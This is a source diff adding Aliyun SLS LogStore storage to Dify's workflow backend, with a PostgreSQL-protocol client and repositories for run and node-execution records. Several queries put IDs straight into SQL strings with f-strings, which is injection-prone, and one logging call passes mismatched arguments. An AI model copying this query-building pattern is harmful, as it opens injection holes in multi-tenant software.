+ """ + # Get Dify's required field indexes + required_keys = {} + if logstore_name == AliyunLogStore.workflow_execution_logstore: + required_keys = self._get_workflow_execution_index_keys() + elif logstore_name == AliyunLogStore.workflow_node_execution_logstore: + required_keys = self._get_workflow_node_execution_index_keys() + + # Check if index exists + existing_config = self.get_existing_index_config(logstore_name) + + if existing_config is None: + # Index doesn't exist, create it + logger.info( + "Logstore %s: Index doesn't exist, creating with %d required fields", + logstore_name, + len(required_keys), + ) + self.create_index(logstore_name) + else: + merged_config, needs_update = self._merge_index_configs(existing_config, required_keys, logstore_name) + + if needs_update: + logger.info("Logstore %s: Updating index to include Dify-required fields", logstore_name) + try: + self.client.update_index(self.project_name, logstore_name, merged_config) + logger.info( + "Logstore %s: Index updated successfully, now has %d total field indexes", + logstore_name, + len(merged_config.key_config_list or {}), + ) + except LogException as e: + logger.exception( + "Failed to update index for logstore %s: errorCode=%s, errorMessage=%s, requestId=%s", + logstore_name, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + else: + logger.info( + "Logstore %s: Index already contains all %d Dify-required fields with correct types, " + "no update needed", + logstore_name, + len(required_keys), + ) + + def put_log(self, logstore: str, contents: Sequence[tuple[str, str]]) -> None: + # Route to PG or SDK based on protocol availability + if self._use_pg_protocol and self._pg_client: + self._pg_client.put_log(logstore, contents, self.log_enabled) + else: + log_item = LogItem(contents=contents) + request = PutLogsRequest(project=self.project_name, logstore=logstore, logitems=[log_item]) + + if self.log_enabled: + logger.info( + "[LogStore-SDK] PUT_LOG | 
logstore=%s | project=%s | items_count=%d", + logstore, + self.project_name, + len(contents), + ) + + try: + self.client.put_logs(request) + except LogException as e: + logger.exception( + "Failed to put logs to logstore %s: errorCode=%s, errorMessage=%s, requestId=%s", + logstore, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + + def get_logs( + self, + logstore: str, + from_time: int, + to_time: int, + topic: str = "", + query: str = "", + line: int = 100, + offset: int = 0, + reverse: bool = True, + ) -> list[dict]: + request = GetLogsRequest( + project=self.project_name, + logstore=logstore, + fromTime=from_time, + toTime=to_time, + topic=topic, + query=query, + line=line, + offset=offset, + reverse=reverse, + ) + + # Log query info if SQLALCHEMY_ECHO is enabled + if self.log_enabled: + logger.info( + "[LogStore] GET_LOGS | logstore=%s | project=%s | query=%s | " + "from_time=%d | to_time=%d | line=%d | offset=%d | reverse=%s", + logstore, + self.project_name, + query, + from_time, + to_time, + line, + offset, + reverse, + ) + + try: + response = self.client.get_logs(request) + result = [] + logs = response.get_logs() if response else [] + for log in logs: + result.append(log.get_contents()) + + # Log result count if SQLALCHEMY_ECHO is enabled + if self.log_enabled: + logger.info( + "[LogStore] GET_LOGS RESULT | logstore=%s | returned_count=%d", + logstore, + len(result), + ) + + return result + except LogException as e: + logger.exception( + "Failed to get logs from logstore %s with query '%s': errorCode=%s, errorMessage=%s, requestId=%s", + logstore, + query, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + + def execute_sql( + self, + sql: str, + logstore: str | None = None, + query: str = "*", + from_time: int | None = None, + to_time: int | None = None, + power_sql: bool = False, + ) -> list[dict]: + """ + Execute SQL query for aggregation and analysis. 
+ + Args: + sql: SQL query string (SELECT statement) + logstore: Name of the logstore (required) + query: Search/filter query for SDK mode (default: "*" for all logs). + Only used in SDK mode. PG mode ignores this parameter. + from_time: Start time (Unix timestamp) - only used in SDK mode + to_time: End time (Unix timestamp) - only used in SDK mode + power_sql: Whether to use enhanced SQL mode (default: False) + + Returns: + List of result rows as dictionaries + + Note: + - PG mode: Only executes the SQL directly + - SDK mode: Combines query and sql as "query | sql" + """ + # Logstore is required + if not logstore: + raise ValueError("logstore parameter is required for execute_sql") + + # Route to PG or SDK based on protocol availability + if self._use_pg_protocol and self._pg_client: + # PG mode: execute SQL directly (ignore query parameter) + return self._pg_client.execute_sql(sql, logstore, self.log_enabled) + else: + # SDK mode: combine query and sql as "query | sql" + full_query = f"{query} | {sql}" + + # Provide default time range if not specified + if from_time is None: + from_time = 0 + + if to_time is None: + to_time = int(time.time()) # now + + request = GetLogsRequest( + project=self.project_name, + logstore=logstore, + fromTime=from_time, + toTime=to_time, + query=full_query, + ) + + # Log query info if SQLALCHEMY_ECHO is enabled + if self.log_enabled: + logger.info( + "[LogStore-SDK] EXECUTE_SQL | logstore=%s | project=%s | from_time=%d | to_time=%d | full_query=%s", + logstore, + self.project_name, + from_time, + to_time, + query, + sql, + ) + + try: + response = self.client.get_logs(request) + + result = [] + logs = response.get_logs() if response else [] + for log in logs: + result.append(log.get_contents()) + + # Log result count if SQLALCHEMY_ECHO is enabled + if self.log_enabled: + logger.info( + "[LogStore-SDK] EXECUTE_SQL RESULT | logstore=%s | returned_count=%d", + logstore, + len(result), + ) + + return result + except LogException as e: + 
logger.exception( + "Failed to execute SQL, logstore %s: errorCode=%s, errorMessage=%s, requestId=%s, full_query=%s", + logstore, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + full_query, + ) + raise + + +if __name__ == "__main__": + aliyun_logstore = AliyunLogStore() + # aliyun_logstore.init_project_logstore() + aliyun_logstore.put_log(AliyunLogStore.workflow_execution_logstore, [("key1", "value1")]) diff --git a/api/extensions/logstore/aliyun_logstore_pg.py b/api/extensions/logstore/aliyun_logstore_pg.py new file mode 100644 index 0000000000..35aa51ce53 --- /dev/null +++ b/api/extensions/logstore/aliyun_logstore_pg.py @@ -0,0 +1,407 @@ +import logging +import os +import socket +import time +from collections.abc import Sequence +from contextlib import contextmanager +from typing import Any + +import psycopg2 +import psycopg2.pool +from psycopg2 import InterfaceError, OperationalError + +from configs import dify_config + +logger = logging.getLogger(__name__) + + +class AliyunLogStorePG: + """ + PostgreSQL protocol support for Aliyun SLS LogStore. + + Handles PG connection pooling and operations for regions that support PG protocol. + """ + + def __init__(self, access_key_id: str, access_key_secret: str, endpoint: str, project_name: str): + """ + Initialize PG connection for SLS. + + Args: + access_key_id: Aliyun access key ID + access_key_secret: Aliyun access key secret + endpoint: SLS endpoint + project_name: SLS project name + """ + self._access_key_id = access_key_id + self._access_key_secret = access_key_secret + self._endpoint = endpoint + self.project_name = project_name + self._pg_pool: psycopg2.pool.SimpleConnectionPool | None = None + self._use_pg_protocol = False + + def _check_port_connectivity(self, host: str, port: int, timeout: float = 2.0) -> bool: + """ + Check if a TCP port is reachable using socket connection. 
+ + This provides a fast check before attempting full database connection, + preventing long waits when connecting to unsupported regions. + + Args: + host: Hostname or IP address + port: Port number + timeout: Connection timeout in seconds (default: 2.0) + + Returns: + True if port is reachable, False otherwise + """ + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(timeout) + result = sock.connect_ex((host, port)) + sock.close() + return result == 0 + except Exception as e: + logger.debug("Port connectivity check failed for %s:%d: %s", host, port, str(e)) + return False + + def init_connection(self) -> bool: + """ + Initialize PostgreSQL connection pool for SLS PG protocol support. + + Attempts to connect to SLS using PostgreSQL protocol. If successful, sets + _use_pg_protocol to True and creates a connection pool. If connection fails + (region doesn't support PG protocol or other errors), returns False. + + Returns: + True if PG protocol is supported and initialized, False otherwise + """ + try: + # Extract hostname from endpoint (remove protocol if present) + pg_host = self._endpoint.replace("http://", "").replace("https://", "") + + # Get pool configuration + pg_max_connections = int(os.environ.get("ALIYUN_SLS_PG_MAX_CONNECTIONS", 10)) + + logger.debug( + "Check PG protocol connection to SLS: host=%s, project=%s", + pg_host, + self.project_name, + ) + + # Fast port connectivity check before attempting full connection + # This prevents long waits when connecting to unsupported regions + if not self._check_port_connectivity(pg_host, 5432, timeout=1.0): + logger.info( + "USE SDK mode for read/write operations, host=%s", + pg_host, + ) + return False + + # Create connection pool + self._pg_pool = psycopg2.pool.SimpleConnectionPool( + minconn=1, + maxconn=pg_max_connections, + host=pg_host, + port=5432, + database=self.project_name, + user=self._access_key_id, + password=self._access_key_secret, + sslmode="require", + 
connect_timeout=5, + application_name=f"Dify-{dify_config.project.version}", + ) + + # Note: Skip test query because SLS PG protocol only supports SELECT/INSERT on actual tables + # Connection pool creation success already indicates connectivity + + self._use_pg_protocol = True + logger.info( + "PG protocol initialized successfully for SLS project=%s. Will use PG for read/write operations.", + self.project_name, + ) + return True + + except Exception as e: + # PG connection failed - fallback to SDK mode + self._use_pg_protocol = False + if self._pg_pool: + try: + self._pg_pool.closeall() + except Exception: + logger.debug("Failed to close PG connection pool during cleanup, ignoring") + self._pg_pool = None + + logger.info( + "PG protocol connection failed (region may not support PG protocol): %s. " + "Falling back to SDK mode for read/write operations.", + str(e), + ) + return False + + def _is_connection_valid(self, conn: Any) -> bool: + """ + Check if a connection is still valid. + + Args: + conn: psycopg2 connection object + + Returns: + True if connection is valid, False otherwise + """ + try: + # Check if connection is closed + if conn.closed: + return False + + # Quick ping test - execute a lightweight query + # For SLS PG protocol, we can't use SELECT 1 without FROM, + # so we just check the connection status + with conn.cursor() as cursor: + cursor.execute("SELECT 1") + cursor.fetchone() + return True + except Exception: + return False + + @contextmanager + def _get_connection(self): + """ + Context manager to get a PostgreSQL connection from the pool. + + Automatically validates and refreshes stale connections. + + Note: Aliyun SLS PG protocol does not support transactions, so we always + use autocommit mode. 
+ + Yields: + psycopg2 connection object + + Raises: + RuntimeError: If PG pool is not initialized + """ + if not self._pg_pool: + raise RuntimeError("PG connection pool is not initialized") + + conn = self._pg_pool.getconn() + try: + # Validate connection and get a fresh one if needed + if not self._is_connection_valid(conn): + logger.debug("Connection is stale, marking as bad and getting a new one") + # Mark connection as bad and get a new one + self._pg_pool.putconn(conn, close=True) + conn = self._pg_pool.getconn() + + # Aliyun SLS PG protocol does not support transactions, always use autocommit + conn.autocommit = True + yield conn + finally: + # Return connection to pool (or close if it's bad) + if self._is_connection_valid(conn): + self._pg_pool.putconn(conn) + else: + self._pg_pool.putconn(conn, close=True) + + def close(self) -> None: + """Close the PostgreSQL connection pool.""" + if self._pg_pool: + try: + self._pg_pool.closeall() + logger.info("PG connection pool closed") + except Exception: + logger.exception("Failed to close PG connection pool") + + def _is_retriable_error(self, error: Exception) -> bool: + """ + Check if an error is retriable (connection-related issues). + + Args: + error: Exception to check + + Returns: + True if the error is retriable, False otherwise + """ + # Retry on connection-related errors + if isinstance(error, (OperationalError, InterfaceError)): + return True + + # Check error message for specific connection issues + error_msg = str(error).lower() + retriable_patterns = [ + "connection", + "timeout", + "closed", + "broken pipe", + "reset by peer", + "no route to host", + "network", + ] + return any(pattern in error_msg for pattern in retriable_patterns) + + def put_log(self, logstore: str, contents: Sequence[tuple[str, str]], log_enabled: bool = False) -> None: + """ + Write log to SLS using PostgreSQL protocol with automatic retry. + + Note: SLS PG protocol only supports INSERT (not UPDATE). 
This uses append-only + writes with log_version field for versioning, same as SDK implementation. + + Args: + logstore: Name of the logstore table + contents: List of (field_name, value) tuples + log_enabled: Whether to enable logging + + Raises: + psycopg2.Error: If database operation fails after all retries + """ + if not contents: + return + + # Extract field names and values from contents + fields = [field_name for field_name, _ in contents] + values = [value for _, value in contents] + + # Build INSERT statement with literal values + # Note: Aliyun SLS PG protocol doesn't support parameterized queries, + # so we need to use mogrify to safely create literal values + field_list = ", ".join([f'"{field}"' for field in fields]) + + if log_enabled: + logger.info( + "[LogStore-PG] PUT_LOG | logstore=%s | project=%s | items_count=%d", + logstore, + self.project_name, + len(contents), + ) + + # Retry configuration + max_retries = 3 + retry_delay = 0.1 # Start with 100ms + + for attempt in range(max_retries): + try: + with self._get_connection() as conn: + with conn.cursor() as cursor: + # Use mogrify to safely convert values to SQL literals + placeholders = ", ".join(["%s"] * len(fields)) + values_literal = cursor.mogrify(f"({placeholders})", values).decode("utf-8") + insert_sql = f'INSERT INTO "{logstore}" ({field_list}) VALUES {values_literal}' + cursor.execute(insert_sql) + # Success - exit retry loop + return + + except psycopg2.Error as e: + # Check if error is retriable + if not self._is_retriable_error(e): + # Not a retriable error (e.g., data validation error), fail immediately + logger.exception( + "Failed to put logs to logstore %s via PG protocol (non-retriable error)", + logstore, + ) + raise + + # Retriable error - log and retry if we have attempts left + if attempt < max_retries - 1: + logger.warning( + "Failed to put logs to logstore %s via PG protocol (attempt %d/%d): %s. 
Retrying...", + logstore, + attempt + 1, + max_retries, + str(e), + ) + time.sleep(retry_delay) + retry_delay *= 2 # Exponential backoff + else: + # Last attempt failed + logger.exception( + "Failed to put logs to logstore %s via PG protocol after %d attempts", + logstore, + max_retries, + ) + raise + + def execute_sql(self, sql: str, logstore: str, log_enabled: bool = False) -> list[dict[str, Any]]: + """ + Execute SQL query using PostgreSQL protocol with automatic retry. + + Args: + sql: SQL query string + logstore: Name of the logstore (for logging purposes) + log_enabled: Whether to enable logging + + Returns: + List of result rows as dictionaries + + Raises: + psycopg2.Error: If database operation fails after all retries + """ + if log_enabled: + logger.info( + "[LogStore-PG] EXECUTE_SQL | logstore=%s | project=%s | sql=%s", + logstore, + self.project_name, + sql, + ) + + # Retry configuration + max_retries = 3 + retry_delay = 0.1 # Start with 100ms + + for attempt in range(max_retries): + try: + with self._get_connection() as conn: + with conn.cursor() as cursor: + cursor.execute(sql) + + # Get column names from cursor description + columns = [desc[0] for desc in cursor.description] + + # Fetch all results and convert to list of dicts + result = [] + for row in cursor.fetchall(): + row_dict = {} + for col, val in zip(columns, row): + row_dict[col] = "" if val is None else str(val) + result.append(row_dict) + + if log_enabled: + logger.info( + "[LogStore-PG] EXECUTE_SQL RESULT | logstore=%s | returned_count=%d", + logstore, + len(result), + ) + + return result + + except psycopg2.Error as e: + # Check if error is retriable + if not self._is_retriable_error(e): + # Not a retriable error (e.g., SQL syntax error), fail immediately + logger.exception( + "Failed to execute SQL query on logstore %s via PG protocol (non-retriable error): sql=%s", + logstore, + sql, + ) + raise + + # Retriable error - log and retry if we have attempts left + if attempt < max_retries - 
1: + logger.warning( + "Failed to execute SQL query on logstore %s via PG protocol (attempt %d/%d): %s. Retrying...", + logstore, + attempt + 1, + max_retries, + str(e), + ) + time.sleep(retry_delay) + retry_delay *= 2 # Exponential backoff + else: + # Last attempt failed + logger.exception( + "Failed to execute SQL query on logstore %s via PG protocol after %d attempts: sql=%s", + logstore, + max_retries, + sql, + ) + raise + + # This line should never be reached due to raise above, but makes type checker happy + return [] diff --git a/api/extensions/logstore/repositories/__init__.py b/api/extensions/logstore/repositories/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/extensions/logstore/repositories/logstore_api_workflow_node_execution_repository.py b/api/extensions/logstore/repositories/logstore_api_workflow_node_execution_repository.py new file mode 100644 index 0000000000..8c804d6bb5 --- /dev/null +++ b/api/extensions/logstore/repositories/logstore_api_workflow_node_execution_repository.py @@ -0,0 +1,365 @@ +""" +LogStore implementation of DifyAPIWorkflowNodeExecutionRepository. + +This module provides the LogStore-based implementation for service-layer +WorkflowNodeExecutionModel operations using Aliyun SLS LogStore. +""" + +import logging +import time +from collections.abc import Sequence +from datetime import datetime +from typing import Any + +from sqlalchemy.orm import sessionmaker + +from extensions.logstore.aliyun_logstore import AliyunLogStore +from models.workflow import WorkflowNodeExecutionModel +from repositories.api_workflow_node_execution_repository import DifyAPIWorkflowNodeExecutionRepository + +logger = logging.getLogger(__name__) + + +def _dict_to_workflow_node_execution_model(data: dict[str, Any]) -> WorkflowNodeExecutionModel: + """ + Convert LogStore result dictionary to WorkflowNodeExecutionModel instance. 
+
+    Args:
+        data: Dictionary from LogStore query result
+
+    Returns:
+        WorkflowNodeExecutionModel instance (detached from session)
+
+    Note:
+        The returned model is not attached to any SQLAlchemy session.
+        Relationship fields (like offload_data) are not loaded from LogStore.
+    """
+    logger.debug("_dict_to_workflow_node_execution_model: data keys=%s", list(data.keys())[:5])
+    # Create model instance without session
+    model = WorkflowNodeExecutionModel()
+
+    # Map all required fields with validation
+    # Critical fields - must not be None
+    model.id = data.get("id") or ""
+    model.tenant_id = data.get("tenant_id") or ""
+    model.app_id = data.get("app_id") or ""
+    model.workflow_id = data.get("workflow_id") or ""
+    model.triggered_from = data.get("triggered_from") or ""
+    model.node_id = data.get("node_id") or ""
+    model.node_type = data.get("node_type") or ""
+    model.status = data.get("status") or "running"  # Default status if missing
+    model.title = data.get("title") or ""
+    model.created_by_role = data.get("created_by_role") or ""
+    model.created_by = data.get("created_by") or ""
+
+    # Numeric fields with defaults
+    model.index = int(data.get("index") or 0)  # "or 0": PG-mode execute_sql maps NULL to "" and int("") raises ValueError
+    model.elapsed_time = float(data.get("elapsed_time") or 0)  # same empty-string guard as above
+
+    # Optional fields
+    model.workflow_run_id = data.get("workflow_run_id")
+    model.predecessor_node_id = data.get("predecessor_node_id")
+    model.node_execution_id = data.get("node_execution_id")
+    model.inputs = data.get("inputs")
+    model.process_data = data.get("process_data")
+    model.outputs = data.get("outputs")
+    model.error = data.get("error")
+    model.execution_metadata = data.get("execution_metadata")
+
+    # Handle datetime fields
+    created_at = data.get("created_at")
+    if created_at:
+        if isinstance(created_at, str):
+            model.created_at = datetime.fromisoformat(created_at)
+        elif isinstance(created_at, (int, float)):
+            model.created_at = datetime.fromtimestamp(created_at)
+        else:
+            model.created_at = created_at
+    else:
+        # Provide default created_at if missing
+        model.created_at = datetime.now()
+
+    finished_at = data.get("finished_at")
+    if finished_at:
+        if isinstance(finished_at, str):
+            model.finished_at = datetime.fromisoformat(finished_at)
+        elif isinstance(finished_at, (int, float)):
+            model.finished_at = datetime.fromtimestamp(finished_at)
+        else:
+            model.finished_at = finished_at
+
+    return model
+
+
+class LogstoreAPIWorkflowNodeExecutionRepository(DifyAPIWorkflowNodeExecutionRepository):
+    """
+    LogStore implementation of DifyAPIWorkflowNodeExecutionRepository.
+
+    Provides service-layer database operations for WorkflowNodeExecutionModel
+    using LogStore SQL queries with optimized deduplication strategies.
+    """
+
+    def __init__(self, session_maker: sessionmaker | None = None):
+        """
+        Initialize the repository with LogStore client.
+
+        Args:
+            session_maker: SQLAlchemy sessionmaker (unused, for compatibility with factory pattern)
+        """
+        logger.debug("LogstoreAPIWorkflowNodeExecutionRepository.__init__: initializing")
+        self.logstore_client = AliyunLogStore()
+
+    def get_node_last_execution(
+        self,
+        tenant_id: str,
+        app_id: str,
+        workflow_id: str,
+        node_id: str,
+    ) -> WorkflowNodeExecutionModel | None:
+        """
+        Get the most recent execution for a specific node.
+
+        Uses query syntax to get raw logs and selects the one with max log_version.
+        Returns the most recent execution ordered by created_at.
+ """ + logger.debug( + "get_node_last_execution: tenant_id=%s, app_id=%s, workflow_id=%s, node_id=%s", + tenant_id, + app_id, + workflow_id, + node_id, + ) + try: + # Check if PG protocol is supported + if self.logstore_client.supports_pg_protocol: + # Use PG protocol with SQL query (get latest version of each record) + sql_query = f""" + SELECT * FROM ( + SELECT *, + ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) as rn + FROM "{AliyunLogStore.workflow_node_execution_logstore}" + WHERE tenant_id = '{tenant_id}' + AND app_id = '{app_id}' + AND workflow_id = '{workflow_id}' + AND node_id = '{node_id}' + AND __time__ > 0 + ) AS subquery WHERE rn = 1 + LIMIT 100 + """ + results = self.logstore_client.execute_sql( + sql=sql_query, + logstore=AliyunLogStore.workflow_node_execution_logstore, + ) + else: + # Use SDK with LogStore query syntax + query = ( + f"tenant_id: {tenant_id} and app_id: {app_id} and workflow_id: {workflow_id} and node_id: {node_id}" + ) + from_time = 0 + to_time = int(time.time()) # now + + results = self.logstore_client.get_logs( + logstore=AliyunLogStore.workflow_node_execution_logstore, + from_time=from_time, + to_time=to_time, + query=query, + line=100, + reverse=False, + ) + + if not results: + return None + + # For SDK mode, group by id and select the one with max log_version for each group + # For PG mode, this is already done by the SQL query + if not self.logstore_client.supports_pg_protocol: + id_to_results: dict[str, list[dict[str, Any]]] = {} + for row in results: + row_id = row.get("id") + if row_id: + if row_id not in id_to_results: + id_to_results[row_id] = [] + id_to_results[row_id].append(row) + + # For each id, select the row with max log_version + deduplicated_results = [] + for rows in id_to_results.values(): + if len(rows) > 1: + max_row = max(rows, key=lambda x: int(x.get("log_version", 0))) + else: + max_row = rows[0] + deduplicated_results.append(max_row) + else: + # For PG mode, results are already 
deduplicated by the SQL query + deduplicated_results = results + + # Sort by created_at DESC and return the most recent one + deduplicated_results.sort( + key=lambda x: x.get("created_at", 0) if isinstance(x.get("created_at"), (int, float)) else 0, + reverse=True, + ) + + if deduplicated_results: + return _dict_to_workflow_node_execution_model(deduplicated_results[0]) + + return None + + except Exception: + logger.exception("Failed to get node last execution from LogStore") + raise + + def get_executions_by_workflow_run( + self, + tenant_id: str, + app_id: str, + workflow_run_id: str, + ) -> Sequence[WorkflowNodeExecutionModel]: + """ + Get all node executions for a specific workflow run. + + Uses query syntax to get raw logs and selects the one with max log_version for each node execution. + Ordered by index DESC for trace visualization. + """ + logger.debug( + "[LogStore] get_executions_by_workflow_run: tenant_id=%s, app_id=%s, workflow_run_id=%s", + tenant_id, + app_id, + workflow_run_id, + ) + try: + # Check if PG protocol is supported + if self.logstore_client.supports_pg_protocol: + # Use PG protocol with SQL query (get latest version of each record) + sql_query = f""" + SELECT * FROM ( + SELECT *, + ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) as rn + FROM "{AliyunLogStore.workflow_node_execution_logstore}" + WHERE tenant_id = '{tenant_id}' + AND app_id = '{app_id}' + AND workflow_run_id = '{workflow_run_id}' + AND __time__ > 0 + ) AS subquery WHERE rn = 1 + LIMIT 1000 + """ + results = self.logstore_client.execute_sql( + sql=sql_query, + logstore=AliyunLogStore.workflow_node_execution_logstore, + ) + else: + # Use SDK with LogStore query syntax + query = f"tenant_id: {tenant_id} and app_id: {app_id} and workflow_run_id: {workflow_run_id}" + from_time = 0 + to_time = int(time.time()) # now + + results = self.logstore_client.get_logs( + logstore=AliyunLogStore.workflow_node_execution_logstore, + from_time=from_time, + to_time=to_time, + 
query=query, + line=1000, # Get more results for node executions + reverse=False, + ) + + if not results: + return [] + + # For SDK mode, group by id and select the one with max log_version for each group + # For PG mode, this is already done by the SQL query + models = [] + if not self.logstore_client.supports_pg_protocol: + id_to_results: dict[str, list[dict[str, Any]]] = {} + for row in results: + row_id = row.get("id") + if row_id: + if row_id not in id_to_results: + id_to_results[row_id] = [] + id_to_results[row_id].append(row) + + # For each id, select the row with max log_version + for rows in id_to_results.values(): + if len(rows) > 1: + max_row = max(rows, key=lambda x: int(x.get("log_version", 0))) + else: + max_row = rows[0] + + model = _dict_to_workflow_node_execution_model(max_row) + if model and model.id: # Ensure model is valid + models.append(model) + else: + # For PG mode, results are already deduplicated by the SQL query + for row in results: + model = _dict_to_workflow_node_execution_model(row) + if model and model.id: # Ensure model is valid + models.append(model) + + # Sort by index DESC for trace visualization + models.sort(key=lambda x: x.index, reverse=True) + + return models + + except Exception: + logger.exception("Failed to get executions by workflow run from LogStore") + raise + + def get_execution_by_id( + self, + execution_id: str, + tenant_id: str | None = None, + ) -> WorkflowNodeExecutionModel | None: + """ + Get a workflow node execution by its ID. + Uses query syntax to get raw logs and selects the one with max log_version. 
+ """ + logger.debug("get_execution_by_id: execution_id=%s, tenant_id=%s", execution_id, tenant_id) + try: + # Check if PG protocol is supported + if self.logstore_client.supports_pg_protocol: + # Use PG protocol with SQL query (get latest version of record) + tenant_filter = f"AND tenant_id = '{tenant_id}'" if tenant_id else "" + sql_query = f""" + SELECT * FROM ( + SELECT *, + ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) as rn + FROM "{AliyunLogStore.workflow_node_execution_logstore}" + WHERE id = '{execution_id}' {tenant_filter} AND __time__ > 0 + ) AS subquery WHERE rn = 1 + LIMIT 1 + """ + results = self.logstore_client.execute_sql( + sql=sql_query, + logstore=AliyunLogStore.workflow_node_execution_logstore, + ) + else: + # Use SDK with LogStore query syntax + if tenant_id: + query = f"id: {execution_id} and tenant_id: {tenant_id}" + else: + query = f"id: {execution_id}" + + from_time = 0 + to_time = int(time.time()) # now + + results = self.logstore_client.get_logs( + logstore=AliyunLogStore.workflow_node_execution_logstore, + from_time=from_time, + to_time=to_time, + query=query, + line=100, + reverse=False, + ) + + if not results: + return None + + # For PG mode, result is already the latest version + # For SDK mode, if multiple results, select the one with max log_version + if self.logstore_client.supports_pg_protocol or len(results) == 1: + return _dict_to_workflow_node_execution_model(results[0]) + else: + max_result = max(results, key=lambda x: int(x.get("log_version", 0))) + return _dict_to_workflow_node_execution_model(max_result) + + except Exception: + logger.exception("Failed to get execution by ID from LogStore: execution_id=%s", execution_id) + raise diff --git a/api/extensions/logstore/repositories/logstore_api_workflow_run_repository.py b/api/extensions/logstore/repositories/logstore_api_workflow_run_repository.py new file mode 100644 index 0000000000..252cdcc4df --- /dev/null +++ 
b/api/extensions/logstore/repositories/logstore_api_workflow_run_repository.py @@ -0,0 +1,757 @@ +""" +LogStore API WorkflowRun Repository Implementation + +This module provides the LogStore-based implementation of the APIWorkflowRunRepository +protocol. It handles service-layer WorkflowRun database operations using Aliyun SLS LogStore +with optimized queries for statistics and pagination. + +Key Features: +- LogStore SQL queries for aggregation and statistics +- Optimized deduplication using finished_at IS NOT NULL filter +- Window functions only when necessary (running status queries) +- Multi-tenant data isolation and security +""" + +import logging +import os +import time +from collections.abc import Sequence +from datetime import datetime +from typing import Any, cast + +from sqlalchemy.orm import sessionmaker + +from extensions.logstore.aliyun_logstore import AliyunLogStore +from libs.infinite_scroll_pagination import InfiniteScrollPagination +from models.enums import WorkflowRunTriggeredFrom +from models.workflow import WorkflowRun +from repositories.api_workflow_run_repository import APIWorkflowRunRepository +from repositories.types import ( + AverageInteractionStats, + DailyRunsStats, + DailyTerminalsStats, + DailyTokenCostStats, +) + +logger = logging.getLogger(__name__) + + +def _dict_to_workflow_run(data: dict[str, Any]) -> WorkflowRun: + """ + Convert LogStore result dictionary to WorkflowRun instance. 
+
+    Args:
+        data: Dictionary from LogStore query result
+
+    Returns:
+        WorkflowRun instance
+    """
+    logger.debug("_dict_to_workflow_run: data keys=%s", list(data.keys())[:5])
+    # Create model instance without session
+    model = WorkflowRun()
+
+    # Map all required fields with validation
+    # Critical fields - must not be None
+    model.id = data.get("id") or ""
+    model.tenant_id = data.get("tenant_id") or ""
+    model.app_id = data.get("app_id") or ""
+    model.workflow_id = data.get("workflow_id") or ""
+    model.type = data.get("type") or ""
+    model.triggered_from = data.get("triggered_from") or ""
+    model.version = data.get("version") or ""
+    model.status = data.get("status") or "running"  # Default status if missing
+    model.created_by_role = data.get("created_by_role") or ""
+    model.created_by = data.get("created_by") or ""
+
+    # Numeric fields with defaults
+    model.total_tokens = int(data.get("total_tokens") or 0)  # "or 0": PG-mode execute_sql maps NULL to "" and int("") raises ValueError
+    model.total_steps = int(data.get("total_steps") or 0)  # same empty-string guard
+    model.exceptions_count = int(data.get("exceptions_count") or 0)  # same empty-string guard
+
+    # Optional fields
+    model.graph = data.get("graph")
+    model.inputs = data.get("inputs")
+    model.outputs = data.get("outputs")
+    model.error = data.get("error_message") or data.get("error")
+
+    # Handle datetime fields
+    started_at = data.get("started_at") or data.get("created_at")
+    if started_at:
+        if isinstance(started_at, str):
+            model.created_at = datetime.fromisoformat(started_at)
+        elif isinstance(started_at, (int, float)):
+            model.created_at = datetime.fromtimestamp(started_at)
+        else:
+            model.created_at = started_at
+    else:
+        # Provide default created_at if missing
+        model.created_at = datetime.now()
+
+    finished_at = data.get("finished_at")
+    if finished_at:
+        if isinstance(finished_at, str):
+            model.finished_at = datetime.fromisoformat(finished_at)
+        elif isinstance(finished_at, (int, float)):
+            model.finished_at = datetime.fromtimestamp(finished_at)
+        else:
+            model.finished_at = finished_at
+
+    # Compute elapsed_time from started_at and finished_at
+    # LogStore doesn't store elapsed_time, it's computed in WorkflowExecution domain entity
+    if model.finished_at and model.created_at:
+        model.elapsed_time = (model.finished_at - model.created_at).total_seconds()
+    else:
+        model.elapsed_time = float(data.get("elapsed_time") or 0)  # "or 0": float("") raises ValueError
+
+    return model
+
+
+class LogstoreAPIWorkflowRunRepository(APIWorkflowRunRepository):
+    """
+    LogStore implementation of APIWorkflowRunRepository.
+
+    Provides service-layer WorkflowRun database operations using LogStore SQL
+    with optimized query strategies:
+    - Use finished_at IS NOT NULL for deduplication (10-100x faster)
+    - Use window functions only when running status is required
+    - Proper time range filtering for LogStore queries
+    """
+
+    def __init__(self, session_maker: sessionmaker | None = None):
+        """
+        Initialize the repository with LogStore client.
+
+        Args:
+            session_maker: SQLAlchemy sessionmaker (unused, for compatibility with factory pattern)
+        """
+        logger.debug("LogstoreAPIWorkflowRunRepository.__init__: initializing")
+        self.logstore_client = AliyunLogStore()
+
+        # Control flag for dual-read (fallback to PostgreSQL when LogStore returns no results)
+        # Set to True to enable fallback for safe migration from PostgreSQL to LogStore
+        # Set to False for new deployments without legacy data in PostgreSQL
+        self._enable_dual_read = os.environ.get("LOGSTORE_DUAL_READ_ENABLED", "true").lower() == "true"
+
+    def get_paginated_workflow_runs(
+        self,
+        tenant_id: str,
+        app_id: str,
+        triggered_from: WorkflowRunTriggeredFrom | Sequence[WorkflowRunTriggeredFrom],
+        limit: int = 20,
+        last_id: str | None = None,
+        status: str | None = None,
+    ) -> InfiniteScrollPagination:
+        """
+        Get paginated workflow runs with filtering.
+
+        Uses window function for deduplication to support both running and finished states.
